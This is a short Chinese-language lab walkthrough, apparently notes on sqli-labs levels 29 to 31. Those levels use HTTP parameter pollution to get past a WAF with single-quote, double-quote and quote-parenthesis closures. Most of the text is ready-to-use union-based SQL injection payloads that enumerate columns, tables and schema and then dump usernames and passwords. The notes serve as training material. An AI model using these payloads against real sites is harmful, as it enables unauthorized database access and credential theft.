5.29.第29关 http参数过滤 '闭合

5.29.1.手动注入

（1）判断注入类型、注入点

'闭合

（2）有回显，优先用联合查询注入，判读字段数

?id=1&id=2' order by 3 --+
?id=1&id=2' order by 4 --+

（3）判断回显位

?id=1&id=0' union select 7,8,9 --+ 

（4）查询数据库

?id=1&id=0' union select 1,database(),3 --+ 

（5）查询表名

?id=1&id=0' union select 7,8,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 

（6）查询字段名

?id=1&id=0' union select 7,8,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

（7）查询账号密码

?id=1&id=0' union select 7,8,group_concat(id,0x7e,username,0x3a,password) from users --+

waf好像没有生效，先照着跑跑

5.30.第30关 http参数过滤 "闭合

与29相同

5.31.第31关 http参数过滤 ")闭合

与29、30相同